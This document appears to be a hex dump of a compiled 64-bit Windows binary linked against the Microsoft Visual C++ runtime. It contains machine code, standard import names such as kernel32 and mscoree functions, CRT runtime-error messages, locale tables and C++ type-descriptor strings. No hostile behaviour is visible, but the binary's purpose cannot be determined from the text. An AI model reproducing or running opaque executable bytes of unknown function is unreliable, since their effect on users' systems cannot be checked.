3ec40498be94d8bf0488bf2488bd9e817ccffff488bbc248000000083b86004000000baffffff1f41b82900008041b92600008041bc010000007538813b63736de074304439037510837b180f750a48817b6020059319741b44390b74168b0f23ca81f922059319720a448467240f857f0100008b4304a8660f8492000000837f04000f846a01000083bc2488000000000f855c01000083e020743e44390b75394d8b86f8000000488bd5488bcfe8300300008bd883f8ff7c053b47047c05e8ab030000448bcb488bce488bd54c8bc7e882fdffffe91901000085c07420443903751b8b733883feff7c053b77047c05e87a030000488b4b28448bceebcc4c8bc7488bd5488bcee8bfb8ffffe9e2000000837f0c00752e8b0723c23d210593190f82cd000000837f2000740ee8cabaffff48634f204803c1eb0233c04885c00f84ae000000813b63736de0756d837b18037267817b2022059319765e488b4330837808007412e8a8baffff488b4b304c6351084c03d0eb034533d24d85d2743a0fb68424980000004c8bcd4d8bc689442438488b842490000000488bd648894424308b842488000000488bcb8944242848897c242041ffd2eb3c488b8424900000004c8bcd4d8bc648894424388b842488000000488bd6894424308a842498000000488bcb8844242848897c2420e8eceeffff418bc4488b5c2460488b6c2468488b7424704883c440415e415c5fc3488bc44889580848896810488970184889782041564883ec208b710433db4d8bf0488bea488bf985f6740e4863f6e8b9b9ffff488d0c06eb03488bcb4885c90f84c800000085f6740f48637704e89ab9ffff488d0c06eb03488bcb3859100f84a9000000f60780740af64500100f859a00000085f67411e870b9ffff488bf0486347044803f0eb03488bf3e874b9ffff488bc8486345044803c8483bf1743a395f047411e843b9ffff488bf0486347044803f0eb03488bf3e847b9ffff48635504488d4e104883c2104803d0e88302000085c0740433c0eb39b0028445007405f60708742441f606017405f60701741941f606047405f60704740e418406740484077405bb010000008bc3eb05b801000000488b5c2430488b6c2438488b742440488b7c24484883c420415ec3cccccc4883ec284d63481c488b014d8bd0418b040183f8fe750b4c8b02498bcae8820000004883c428c3cc40534883ec204c8d4c2440498bd8e859b4ffff488b084863431c48894c24408b4408044883c4205bc3cccccc4963501c488b0144890c02c348895c240
dc3cc40554883ec20488bea48634d20488bc1488b156bfc0000488b14cae84aa9ffff904883c4205dc3cc40554883ec20488beab9010000004883c4205de92a97ffffcc40554883ec20488beab9010000004883c4205de91197ffffcc40554883ec20488bea8b4d504883c4205de906f6ffffcc40554883ec20488bea488b4d304883c4205de992a8ffffcc40554883ec20488beab90a0000004883c4205de9c996ffffcc40554883ec20488bea8b4d404883c4205de9bef5ffffcccccccccccccccccccc488d0d198e000048ff257a100000000000000000000000000000000000000000c078010000000000d678010000000000d47d010000000000c67d010000000000b67d010000000000a27d010000000000927d010000000000807d010000000000707d0100000000005c7d0100000000004c7d010000000000227901000000000032790100000000003e7901000000000054790100000000006a79010000000000767901000000000088790100000000009e79010000000000ae79010000000000be79010000000000ca79010000000000d679010000000000f079010000000000fe79010000000000127a010000000000247a010000000000387a010000000000547a010000000000647a010000000000727a010000000000887a0100000000009a7a010000000000ac7a010000000000bc7a010000000000ca7a010000000000e27a010000000000f47a0100000000000a7b010000000000247b0100000000003a7b010000000000547b0100000000006e7b010000000000887b0100000000009c7b010000000000b07b010000000000cc7b010000000000ea7b010000000000127c0100000000001a7c0100000000002e7c010000000000427c0100000000004e7c0100000000005c7c0100000000006a7c010000000000747c010000000000887c010000000000947c010000000000a07c010000000000b67c010000000000ce7c010000000000e67c010000000000f87c010000000000027d0100000000000e7d0100000000001a7d0100000000002c7d0100000000003a7d0100000000000000000000000000160000000000008006000000000000801a00000000000080150000000000008008000000000000800f0000000000008010000000000000809b01000000000080090000000000008002000000000000800000000000000000027901000000000000000000000000000000000000000000001000800100000000000000000000000000000000000000f025008001000000b476008001000000448c008001000000d49800800100000000000000000000000000000000000000c0b8008001000000c4eb0080010000006c9900800100000000000000000000000000000000000000000000000000000000000000abefc35500000000020000007b000000d0640100d04a010000000000abefc355000000000c000000140000004c6501004c4b0100b020008001000000b065018001000000f422008001000000083900800100000062616420616c6c6f636174696f6e000000000000000000002900008001000000000000000000000000000000000000000f00000000000000200593190000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000063736de00100000000000000000000000000000000000000040000000000000020059319000000000000000000000000000000000000000000000000000000003066018001000000a8300080010000002c33008001000000c0da01800100000060db018001000000a86601800100000048380080010000000839008001000000556e6b6e6f776e20657863657074696f6e000000000000000000000000000000050000c00b00000000000000000000001d0000c0040000000000000000000000960000c00400000000000000000000008d0000c00800000000000000000000008e0000c00800000000000000000000008f0000c0080000000000000000000000900000c0080000000000000000000000910000c0080000000000000000000000920000c0080000000000000000000000930000c0080000000000000000000000b40200c0080000000000000000000000b50200c00800000000000000000000000c000000c000000003000000090000006d00730063006f007200650065002e0064006c006c000000436f724578697450726f6365737300006b00650072006e0065006c00330032002e0064006c006c000000000000000000466c73416c6c6f630000000000000000466c734672656500466c7347657456616c75650000000000466c7353657456616c75650000
000000496e697469616c697a65437269746963616c53656374696f6e457800000000004372656174654576656e74457857000043726561746553656d6170686f7265457857000000000000536574546872656164537461636b47756172616e74656500437265617465546872656164706f6f6c54696d6572000000536574546872656164706f6f6c54696d657200000000000057616974466f72546872656164706f6f6c54696d657243616c6c6261636b7300436c6f7365546872656164706f6f6c54696d657200000000437265617465546872656164706f6f6c5761697400000000536574546872656164706f6f6c5761697400000000000000436c6f7365546872656164706f6f6c576169740000000000466c75736850726f636573735772697465427566666572730000000000000000467265654c6962726172795768656e43616c6c6261636b52657475726e73000047657443757272656e7450726f636573736f724e756d626572000000000000004765744c6f676963616c50726f636573736f72496e666f726d6174696f6e000043726561746553796d626f6c69634c696e6b57000000000053657444656661756c74446c6c4469726563746f726965730000000000000000456e756d53797374656d4c6f63616c657345780000000000436f6d70617265537472696e6745780047657444617465466f726d61744578004765744c6f63616c65496e666f45780047657454696d65466f726d61744578004765745573657244656661756c744c6f63616c654e616d650000000000000000497356616c69644c6f63616c654e616d65000000000000004c434d6170537472696e67457800000047657443757272656e745061636b616765496400000000004765745469636b436f756e743634000047657446696c65496e666f726d6174696f6e427948616e646c6545785700000053657446696c65496e666f726d6174696f6e427948616e646c655700000000000200000000000000500a0180010000000800000000000000b00a0180010000000900000000000000100b0180010000000a00000000000000700b0180010000001000000000000000c00b0180010000001100000000000000200c0180010000001200000000000000800c0180010000001300000000000000d00c0180010000001800000000000000300d0180010000001900000000000000a00d0180010000001a00000000000000f00d0180010000001b00000000000000600e0180010000001c00000000000000d00e0180010000001e00000000000000200f0180010000001f00000000000000600f018001000000200000000000000030100180010000002100000000000000a010018001000000220000000000000090120180010000007800000000000000f812018001000000790000000000000018130180010000007a000000000000003813018001000000fc000000000000005413018001000000ff000000000000006013018001000000520036003000300032000d000a002d00200066006c006f006100740069006e006700200070006f0069006e007400200073007500700070006f007200740020006e006f00740020006c006f0061006400650064000d000a000000000000000000520036003000300038000d000a002d0020006e006f007400200065006e006f00750067006800200073007000610063006500200066006f007200200061007200670075006d0065006e00740073000d000a000000000000000000000000000000520036003000300039000d000a002d0020006e006f007400200065006e006f00750067006800200073007000610063006500200066006f007200200065006e007600690072006f006e006d0065006e0074000d000a0000000000000000000000520036003000310030000d000a002d002000610062006f007200740028002900200068006100730020006200650065006e002000630061006c006c00650064000d000a00000000000000000000000000520036003000310036000d000a002d0020006e006f007400200065006e006f00750067006800200073007000610063006500200066006f0072002000740068007200650061006400200064006100740061000d000a0000000000000000000000520036003000310037000d000a002d00200075006e006500780070006500630074006500640020006d0075006c007400690074006800720065006100640020006c006f0063006b0020006500720072006f0072000d000a000000000000000000520036003000310038000d000a002d00200075006e00650078007000650063007400650064002000680065006100700020006500720072006f0072000d000a0000000000000000000000000000000000520036003000310039000d000a002d00200075006e00610062006c006500200074006f0020006f00700065006e002
00063006f006e0073006f006c00650020006400650076006900630065000d000a0000000000000000000000000000000000520036003000320034000d000a002d0020006e006f007400200065006e006f00750067006800200073007000610063006500200066006f00720020005f006f006e0065007800690074002f0061007400650078006900740020007400610062006c0065000d000a000000000000000000520036003000320035000d000a002d002000700075007200650020007600690072007400750061006c002000660075006e006300740069006f006e002000630061006c006c000d000a00000000000000520036003000320036000d000a002d0020006e006f007400200065006e006f00750067006800200073007000610063006500200066006f007200200073007400640069006f00200069006e0069007400690061006c0069007a006100740069006f006e000d000a000000000000000000520036003000320037000d000a002d0020006e006f007400200065006e006f00750067006800200073007000610063006500200066006f00720020006c006f00770069006f00200069006e0069007400690061006c0069007a006100740069006f006e000d000a000000000000000000520036003000320038000d000a002d00200075006e00610062006c006500200074006f00200069006e0069007400690061006c0069007a006500200068006500610070000d000a000000000000000000520036003000330030000d000a002d00200043005200540020006e006f007400200069006e0069007400690061006c0069007a00650064000d000a0000000000520036003000330031000d000a002d00200041007400740065006d0070007400200074006f00200069006e0069007400690061006c0069007a0065002000740068006500200043005200540020006d006f007200650020007400680061006e0020006f006e00630065002e000a005400680069007300200069006e006400690063006100740065007300200061002000620075006700200069006e00200079006f007500720020006100700070006c00690063006100740069006f006e002e000d000a00000000000000000000000000520036003000330032000d000a002d0020006e006f007400200065006e006f00750067006800200073007000610063006500200066006f00720020006c006f00630061006c006500200069006e0066006f0072006d006100740069006f006e000d000a00000000000000000000000000520036003000330033000d000a002d00200041007400740065006d0070007400200074006f00200075007300650020004d00530049004c00200063006f00640065002000660072006f006d0020007400680069007300200061007300730065006d0062006c007900200064007500720069006e00670020006e0061007400690076006500200063006f0064006500200069006e0069007400690061006c0069007a006100740069006f006e000a005400680069007300200069006e006400690063006100740065007300200061002000620075006700200069006e00200079006f007500720020006100700070006c00690063006100740069006f006e002e0020004900740020006900730020006d006f007300740020006c0069006b0065006c0079002000740068006500200072006500730075006c00740020006f0066002000630061006c006c0069006e006700200061006e0020004d00530049004c002d0063006f006d00700069006c0065006400200028002f0063006c00720029002000660075006e006300740069006f006e002000660072006f006d002000610020006e0061007400690076006500200063006f006e007300740072007500630074006f00720020006f0072002000660072006f006d00200044006c006c004d00610069006e002e000d000a0000000000520036003000330034000d000a002d00200069006e0063006f006e00730069007300740065006e00740020006f006e006500780069007400200062006500670069006e002d0065006e00640020007600610072006900610062006c00650073000d000a000000000044004f004d00410049004e0020006500720072006f0072000d000a0000000000530049004e00470020006500720072006f0072000d000a00000000000000000054004c004f005300530020006500720072006f0072000d000a0000000d000a000000000000000000720075006e00740069006d00650020006500720072006f007200200000000000520075006e00740069006d00650020004500720072006f00720021000a000a00500072006f006700720061006d003a0020000000000000003c00700072006f006700720061006d0020006e0061006d006500200075006e006b006e006f0077006e003e00000000002e002e002e000000
0a000a000000000000000000000000004d006900630072006f0073006f00660074002000560069007300750061006c00200043002b002b002000520075006e00740069006d00650020004c006900620072006100720079000000000000000000b85f008001000000d0660180010000005c60008001000000083900800100000062616420657863657074696f6e000000652b303030000000000000000000000053756e004d6f6e00547565005765640054687500467269005361740053756e64617900004d6f6e64617900000000000054756573646179005765646e6573646179000000000000005468757273646179000000004672696461790000000000005361747572646179000000004a616e00466562004d617200417072004d6179004a756e004a756c0041756700536570004f6374004e6f760044656300000000004a616e75617279004665627275617279000000004d61726368000000417072696c0000004a756e65000000004a756c790000000041756775737400000000000053657074656d626572000000000000004f63746f626572004e6f76656d6265720000000000000000446563656d62657200000000414d0000504d0000000000004d4d2f64642f79790000000000000000646464642c204d4d4d4d2064642c2079797979000000000048483a6d6d3a73730000000000000000530075006e0000004d006f006e00000054007500650000005700650064000000540068007500000046007200690000005300610074000000530075006e00640061007900000000004d006f006e0064006100790000000000540075006500730064006100790000005700650064006e0065007300640061007900000000000000540068007500720073006400610079000000000000000000460072006900640061007900000000005300610074007500720064006100790000000000000000004a0061006e00000046006500620000004d0061007200000041007000720000004d006100790000004a0075006e0000004a0075006c000000410075006700000053006500700000004f006300740000004e006f007600000044006500630000004a0061006e00750061007200790000004600650062007200750061007200790000000000000000004d00610072006300680000000000000041007000720069006c000000000000004a0075006e00650000000000000000004a0075006c007900000000000000000041007500670075007300740000000000530065007000740065006d006200650072000000000000004f00630074006f0062006500720000004e006f00760065006d00620065007200000000000000000044006500630065006d006200650072000000000041004d000000000050004d0000000000000000004d004d002f00640064002f0079007900000000000000000064006400640064002c0020004d004d004d004d002000640064002c00200079007900790079000000480048003a006d006d003a0073007300000000000000000065006e002d0055005300000000000000701801800100000080180180010000009018018001000000a0180180010000006a0061002d004a0050000000000000007a0068002d0043004e000000000000006b006f002d004b0052000000000000007a0068002d00540057000000000000005500530045005200330032002e0044004c004c00000000004d657373616765426f7857000000000047657441637469766557696e646f77004765744c617374416374697665506f707570000000000000476574557365724f626a656374496e666f726d6174696f6e570000000000000047657450726f6365737357696e646f7753746174696f6e000000000000000000581c018001000000681c018001000000701c018001000000801c018001000000901c018001000000a01c018001000000b01c018001000000c01c018001000000cc1c018001000000d81c018001000000e01c018001000000f01c018001000000001d0180010000000a1d0180010000000c1d018001000000181d018001000000201d018001000000241d018001000000281d0180010000002c1d018001000000301d018001000000341d018001000000381d018001000000401d0180010000004c1d018001000000501d018001000000541d018001000000581d0180010000005c1d018001000000601d018001000000641d018001000000681d0180010000006c1d018001000000701d018001000000741d018001000000781d0180010000007c1d018001000000801d018001000000841d018001000000881d0180010000008c1d018001000000901d018001000000941d018001000000981d0180010000009c1d018001000000a01d018001000000a41d018001000000a81d018001000000ac1d018001000000b01d018001000000b41d018001000000b81d018001000000bc1
d018001000000c01d018001000000c41d018001000000c81d018001000000d81d018001000000e81d018001000000f01d018001000000001e018001000000181e018001000000281e018001000000401e018001000000601e018001000000801e018001000000a01e018001000000c01e018001000000e01e018001000000081f018001000000281f018001000000501f018001000000701f018001000000981f018001000000b81f018001000000c81f018001000000cc1f018001000000d81f018001000000e81f0180010000000c2001800100000018200180010000002820018001000000382001800100000058200180010000007820018001000000a020018001000000c820018001000000f0200180010000002021018001000000402101800100000068210180010000009021018001000000c021018001000000f0210180010000000a1d018001000000102201800100000028220180010000004822018001000000602201800100000080220180010000005f5f62617365642800000000000000005f5f636465636c005f5f70617363616c00000000000000005f5f73746463616c6c000000000000005f5f7468697363616c6c0000000000005f5f6661737463616c6c0000000000005f5f766563746f7263616c6c000000005f5f636c7263616c6c0000005f5f656162690000000000005f5f7074723634005f5f72657374726963740000000000005f5f756e616c69676e65640000000000726573747269637428000000206e657700000000000000002064656c657465003d0000003e3e00003c3c0000210000003d3d0000213d00005b5d0000000000006f70657261746f72000000002d3e00002a0000002b2b00002d2d00002d0000002b000000260000002d3e2a002f000000250000003c0000003c3d00003e0000003e3d00002c000000282900007e0000005e0000007c000000262600007c7c00002a3d00002b3d00002d3d00002f3d0000253d00003e3e3d003c3c3d00263d00007c3d00005e3d00006076667461626c6527000000000000006076627461626c652700000000000000607663616c6c270060747970656f66270000000000000000606c6f63616c20737461746963206775617264270000000060737472696e672700000000000000006076626173652064657374727563746f722700000000000060766563746f722064656c6574696e672064657374727563746f7227000000006064656661756c7420636f6e7374727563746f7220636c6f7375726527000000607363616c61722064656c6574696e672064657374727563746f72270000000060766563746f7220636f6e7374727563746f72206974657261746f722700000060766563746f722064657374727563746f72206974657261746f72270000000060766563746f7220766261736520636f6e7374727563746f72206974657261746f72270000000000607669727475616c20646973706c6163656d656e74206d61702700000000000060656820766563746f7220636f6e7374727563746f72206974657261746f7227000000000000000060656820766563746f722064657374727563746f72206974657261746f72270060656820766563746f7220766261736520636f6e7374727563746f72206974657261746f7227000060636f707920636f6e7374727563746f7220636c6f7375726527000000000000607564742072657475726e696e67270060454800605254544900000000000000606c6f63616c2076667461626c652700606c6f63616c2076667461626c6520636f6e7374727563746f7220636c6f737572652700206e65775b5d0000000000002064656c6574655b5d00000000000000606f6d6e692063616c6c73696727000060706c6163656d656e742064656c65746520636c6f737572652700000000000060706c6163656d656e742064656c6574655b5d20636c6f737572652700000000606d616e6167656420766563746f7220636f6e7374727563746f72206974657261746f7227000000606d616e6167656420766563746f722064657374727563746f72206974657261746f72270000000060656820766563746f7220636f707920636f6e7374727563746f72206974657261746f722700000060656820766563746f7220766261736520636f707920636f6e7374727563746f72206974657261746f722700000000006064796e616d696320696e697469616c697a657220666f7220270000000000006064796e616d6963206174657869742064657374727563746f7220666f722027000000000000000060766563746f7220636f707920636f6e7374727563746f72206974657261746f722700000000000060766563746f7220766261736520636f707920636f6e7374727563746f72206974657261746f72270000000000000000606d616e6167656420766563746f7220636f70
7920636f6e7374727563746f72206974657261746f7227000000000000606c6f63616c207374617469632074687265616420677561726427000000000020547970652044657363726970746f722700000000000000204261736520436c6173732044657363726970746f7220617420280000000000204261736520436c6173732041727261792700000000000020436c617373204869657261726368792044657363726970746f72270000000020436f6d706c657465204f626a656374204c6f6361746f722700000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000200020002000200020002000200020002800280028002800280020002000200020002000200020002000200020002000200020002000200020002000200048001000100010001000100010001000100010001000100010001000100010008400840084008400840084008400840084008400100010001000100010001000100081008100810081008100810001000100010001000100010001000100010001000100010001000100010001000100010001000100100010001000100010001000820082008200820082008200020002000200020002000200020002000200020002000200020002000200020002000200020002001000100010001000200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000020002000200020002000200020002000200028002800280028002800200020002000200020002000200020002000200020002000200020002000200020002000480010001000100010001000100010001000100010001000100010001000100084008400840084008400840084008400840084001000100010001000100010001000810181018101810181018101010101010101010101010101010101010101010101010101010101010101010101010101010101011000100010001000100010008201820182018201820182010201020102010201020102010201020102010201020102010201020102010201020102010201020110001000100010002000200020002000200020002000200020002000200020002000200020002000200020002000200020002000200020002000200020002000200020002000200020000800100010001000100010001000100010001000100010001000100010001000100010001000100010001000100010001000100010001000100010001000100001010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101100001010101010101010101010101010201020102010201020102010201020102010201020102010201020102010201020102010201020102010201020102011000020102010201020102010201020102010101000000000000000000000000808182838485868788898a8b8c8d8e8f909192939495969798999a9b9c9d9e9fa0a1a2a3a4a5a6a7a8a9aaabacadaeafb0b1b2b3b4b5b6b7b8b9babbbcbdbebfc0c1c2c3c4c5c6c7c8c9cacbcccdcecfd0d1d2d3d4d5d6d7d8d9dadbdcdddedfe0e1e2e3e4e5e6e7e8e9eaebecedeeeff0f1f2f3f4f5f6f7f8f9fafbfcfdfeff000102030405060708090a0b0c0d0e0f101112131415161718191a1b1c1d1e1f202122232425262728292a2b2c2d2e2f303132333435363738393a3b3c3d3e3f406162636465666768696a6b6c6d6e6f707172737475767778797a5b5c5d5e5f606162636465666768696a6b6c6d6e6f707172737475767778797a7b7c7d7e7f808182838485868788898a8b8c8d8e8f909192939
495969798999a9b9c9d9e9fa0a1a2a3a4a5a6a7a8a9aaabacadaeafb0b1b2b3b4b5b6b7b8b9babbbcbdbebfc0c1c2c3c4c5c6c7c8c9cacbcccdcecfd0d1d2d3d4d5d6d7d8d9dadbdcdddedfe0e1e2e3e4e5e6e7e8e9eaebecedeeeff0f1f2f3f4f5f6f7f8f9fafbfcfdfeff808182838485868788898a8b8c8d8e8f909192939495969798999a9b9c9d9e9fa0a1a2a3a4a5a6a7a8a9aaabacadaeafb0b1b2b3b4b5b6b7b8b9babbbcbdbebfc0c1c2c3c4c5c6c7c8c9cacbcccdcecfd0d1d2d3d4d5d6d7d8d9dadbdcdddedfe0e1e2e3e4e5e6e7e8e9eaebecedeeeff0f1f2f3f4f5f6f7f8f9fafbfcfdfeff000102030405060708090a0b0c0d0e0f101112131415161718191a1b1c1d1e1f202122232425262728292a2b2c2d2e2f303132333435363738393a3b3c3d3e3f404142434445464748494a4b4c4d4e4f505152535455565758595a5b5c5d5e5f604142434445464748494a4b4c4d4e4f505152535455565758595a7b7c7d7e7f808182838485868788898a8b8c8d8e8f909192939495969798999a9b9c9d9e9fa0a1a2a3a4a5a6a7a8a9aaabacadaeafb0b1b2b3b4b5b6b7b8b9babbbcbdbebfc0c1c2c3c4c5c6c7c8c9cacbcccdcecfd0d1d2d3d4d5d6d7d8d9dadbdcdddedfe0e1e2e3e4e5e6e7e8e9eaebecedeeeff0f1f2f3f4f5f6f7f8f9fafbfcfdfeff0100000000000000304701800100000002000000000000003847018001000000030000000000000040470180010000000400000000000000484701800100000005000000000000005847018001000000060000000000000060470180010000000700000000000000684701800100000008000000000000007047018001000000090000000000000078470180010000000a0000000000000080470180010000000b0000000000000088470180010000000c0000000000000090470180010000000d0000000000000098470180010000000e00000000000000a0470180010000000f00000000000000a8470180010000001000000000000000b0470180010000001100000000000000b8470180010000001200000000000000c0470180010000001300000000000000c8470180010000001400000000000000d0470180010000001500000000000000d8470180010000001600000000000000e0470180010000001800000000000000e8470180010000001900000000000000f0470180010000001a00000000000000f8470180010000001b0000000000000000480180010000001c0000000000000008480180010000001d0000000000000010480180010000001e0000000000000018480180010000001f0000000000000020480180010000002000000000000000284801800100000021000000000000003048018001000000220000000000000038480180010000002300000000000000404801800100000024000000000000004848018001000000250000000000000050480180010000002600000000000000584801800100000027000000000000006048018001000000290000000000000068480180010000002a0000000000000070480180010000002b0000000000000078480180010000002c0000000000000080480180010000002d0000000000000088480180010000002f000000000000009048018001000000360000000000000098480180010000003700000000000000a0480180010000003800000000000000a8480180010000003900000000000000b0480180010000003e00000000000000b8480180010000003f00000000000000c0480180010000004000000000000000c8480180010000004100000000000000d0480180010000004300000000000000d8480180010000004400000000000000e0480180010000004600000000000000e8480180010000004700000000000000f0480180010000004900000000000000f8480180010000004a0000000000000000490180010000004b0000000000000008490180010000004e0000000000000010490180010000004f0000000000000018490180010000005000000000000000204901800100000056000000000000002849018001000000570000000000000030490180010000005a000000000000003849018001000000650000000000000040490180010000007f0000000000000048490180010000000104000000000000504901800100000002040000000000006049018001000000030400000000000070490180010000000404000000000000a01801800100000005040000000000008049018001000000060400000000000090490180010000000704000000000000a0490180010000000804000000000000b049018001000000090400000000000040180180010000000b04000000000000c0490180010000000c04000000000000d0490180010000000d04000000000000e0490180010000000e04000000000000f0490180010000000f0400000000
0000004a0180010000001004000000000000104a01800100000011040000000000007018018001000000120400000000000090180180010000001304000000000000204a0180010000001404000000000000304a0180010000001504000000000000404a0180010000001604000000000000504a0180010000001804000000000000604a0180010000001904000000000000704a0180010000001a04000000000000804a0180010000001b04000000000000904a0180010000001c04000000000000a04a0180010000001d04000000000000b04a0180010000001e04000000000000c04a0180010000001f04000000000000d04a0180010000002004000000000000e04a0180010000002104000000000000f04a0180010000002204000000000000004b0180010000002304000000000000104b0180010000002404000000000000204b0180010000002504000000000000304b0180010000002604000000000000404b0180010000002704000000000000504b0180010000002904000000000000604b0180010000002a04000000000000704b0180010000002b04000000000000804b0180010000002c04000000000000904b0180010000002d04000000000000a84b0180010000002f04000000000000b84b0180010000003204000000000000c84b0180010000003404000000000000d84b0180010000003504000000000000e84b0180010000003604000000000000f84b0180010000003704000000000000084c0180010000003804000000000000184c0180010000003904000000000000284c0180010000003a04000000000000384c0180010000003b04000000000000484c0180010000003e04000000000000584c0180010000003f04000000000000684c0180010000004004000000000000784c0180010000004104000000000000884c0180010000004304000000000000984c0180010000004404000000000000b04c0180010000004504000000000000c04c0180010000004604000000000000d04c0180010000004704000000000000e04c0180010000004904000000000000f04c0180010000004a04000000000000004d0180010000004b04000000000000104d0180010000004c04000000000000204d0180010000004e04000000000000304d0180010000004f04000000000000404d0180010000005004000000000000504d0180010000005204000000000000604d0180010000005604000000000000704d0180010000005704000000000000804d0180010000005a04000000000000904d0180010000006504000000000000a04d0180010000006b04000000000000b04d0180010000006c04000000000000c04d0180010000008104000000000000d04d0180010000000108000000000000e04d018001000000040800000000000080180180010000000708000000000000f04d0180010000000908000000000000004e0180010000000a08000000000000104e0180010000000c08000000000000204e0180010000001008000000000000304e0180010000001308000000000000404e0180010000001408000000000000504e0180010000001608000000000000604e0180010000001a08000000000000704e0180010000001d08000000000000884e0180010000002c08000000000000984e0180010000003b08000000000000b04e0180010000003e08000000000000c04e0180010000004308000000000000d04e0180010000006b08000000000000e84e018001000000010c000000000000f84e018001000000040c000000000000084f018001000000070c000000000000184f018001000000090c000000000000284f0180010000000a0c000000000000384f0180010000000c0c000000000000484f0180010000001a0c000000000000584f0180010000003b0c000000000000704f0180010000006b0c000000000000804f0180010000000110000000000000904f0180010000000410000000000000a04f0180010000000710000000000000b04f0180010000000910000000000000c04f0180010000000a10000000000000d04f0180010000000c10000000000000e04f0180010000001a10000000000000f04f0180010000003b100000000000000050018001000000011400000000000010500180010000000414000000000000205001800100000007140000000000003050018001000000091400000000000040500180010000000a1400000000000050500180010000000c1400000000000060500180010000001a1400000000000070500180010000003b140000000000008850018001000000011800000000000098500180010000000918000000000000a8500180010000000a18000000000000b8500180010000000c18000000000000c8500180010000001a18000000000000d8500180010000003b18000000000000f050018001000000011c00000000000
00051018001000000091c00000000000010510180010000000a1c00000000000020510180010000001a1c00000000000030510180010000003b1c000000000000485101800100000001200000000000005851018001000000092000000000000068510180010000000a2000000000000078510180010000003b200000000000008851018001000000012400000000000098510180010000000924000000000000a8510180010000000a24000000000000b8510180010000003b24000000000000c8510180010000000128000000000000d8510180010000000928000000000000e8510180010000000a28000000000000f851018001000000012c0000000000000852018001000000092c00000000000018520180010000000a2c000000000000285201800100000001300000000000003852018001000000093000000000000048520180010000000a30000000000000585201800100000001340000000000006852018001000000093400000000000078520180010000000a340000000000008852018001000000013800000000000098520180010000000a38000000000000a852018001000000013c000000000000b8520180010000000a3c000000000000c8520180010000000140000000000000d8520180010000000a40000000000000e8520180010000000a44000000000000f8520180010000000a4800000000000008530180010000000a4c00000000000018530180010000000a500000000000002853018001000000047c00000000000038530180010000001a7c00000000000048530180010000004849018001000000420000000000000098480180010000002c0000000000000050530180010000007100000000000000304701800100000000000000000000006053018001000000d8000000000000007053018001000000da000000000000008053018001000000b1000000000000009053018001000000a000000000000000a0530180010000008f00000000000000b053018001000000cf00000000000000c053018001000000d500000000000000d053018001000000d200000000000000e053018001000000a900000000000000f053018001000000b9000000000000000054018001000000c4000000000000001054018001000000dc00000000000000205401800100000043000000000000003054018001000000cc000000000000004054018001000000bf000000000000005054018001000000c8000000000000008048018001000000290000000000000060540180010000009b0000000000000078540180010000006b00000000000000404801800100000021000000000000009054018001000000630000000000000038470180010000000100000000000000a0540180010000004400000000000000b0540180010000007d00000000000000c054018001000000b70000000000000040470180010000000200000000000000d854018001000000450000000000000058470180010000000400000000000000e8540180010000004700000000000000f85401800100000087000000000000006047018001000000050000000000000008550180010000004800000000000000684701800100000006000000000000001855018001000000a20000000000000028550180010000009100000000000000385501800100000049000000000000004855018001000000b3000000000000005855018001000000ab000000000000004049018001000000410000000000000068550180010000008b000000000000007047018001000000070000000000000078550180010000004a00000000000000784701800100000008000000000000008855018001000000a3000000000000009855018001000000cd00000000000000a855018001000000ac00000000000000b855018001000000c900000000000000c8550180010000009200000000000000d855018001000000ba00000000000000e855018001000000c500000000000000f855018001000000b4000000000000000856018001000000d6000000000000001856018001000000d00000000000000028560180010000004b000000000000003856018001000000c0000000000000004856018001000000d300000000000000804701800100000009000000000000005856018001000000d1000000000000006856018001000000dd000000000000007856018001000000d7000000000000008856018001000000ca000000000000009856018001000000b500000000000000a856018001000000c100000000000000b856018001000000d400000000000000c856018001000000a400000000000000d856018001000000ad00000000000000e856018001000000df00000000000000f85601800100000093000000000000000857018001000000e0000000000000001857018001000000bb000000000000002857018001000000ce
000000000000003857018001000000e1000000000000004857018001000000db000000000000005857018001000000de000000000000006857018001000000d9000000000000007857018001000000c600000000000000504801800100000023000000000000008857018001000000650000000000000088480180010000002a0000000000000098570180010000006c0000000000000068480180010000002600000000000000a857018001000000680000000000000088470180010000000a00000000000000b8570180010000004c00000000000000a8480180010000002e00000000000000c857018001000000730000000000000090470180010000000b00000000000000d8570180010000009400000000000000e857018001000000a500000000000000f857018001000000ae0000000000000008580180010000004d000000000000001858018001000000b6000000000000002858018001000000bc0000000000000028490180010000003e0000000000000038580180010000008800000000000000f048018001000000370000000000000048580180010000007f0000000000000098470180010000000c0000000000000058580180010000004e00000000000000b0480180010000002f0000000000000068580180010000007400000000000000f84701800100000018000000000000007858018001000000af0000000000000088580180010000005a00000000000000a0470180010000000d0000000000000098580180010000004f0000000000000078480180010000002800000000000000a8580180010000006a0000000000000030480180010000001f00000000000000b8580180010000006100000000000000a8470180010000000e00000000000000c8580180010000005000000000000000b0470180010000000f00000000000000d8580180010000009500000000000000e8580180010000005100000000000000b8470180010000001000000000000000f8580180010000005200000000000000a0480180010000002d0000000000000008590180010000007200000000000000c04801800100000031000000000000001859018001000000780000000000000008490180010000003a0000000000000028590180010000008200000000000000c047018001000000110000000000000030490180010000003f000000000000003859018001000000890000000000000048590180010000005300000000000000c8480180010000003200000000000000585901800100000079000000000000006048018001000000250000000000000068590180010000006700000000000000584801800100000024000000000000007859018001000000660000000000000088590180010000008e0000000000000090480180010000002b0000000000000098590180010000006d00000000000000a859018001000000830000000000000020490180010000003d00000000000000b859018001000000860000000000000010490180010000003b00000000000000c8590180010000008400000000000000b8480180010000003000000000000000d8590180010000009d00000000000000e8590180010000007700000000000000f8590180010000007500000000000000085a0180010000005500000000000000c8470180010000001200000000000000185a0180010000009600000000000000285a0180010000005400000000000000385a0180010000009700000000000000d0470180010000001300000000000000485a0180010000008d00000000000000e8480180010000003600000000000000585a0180010000007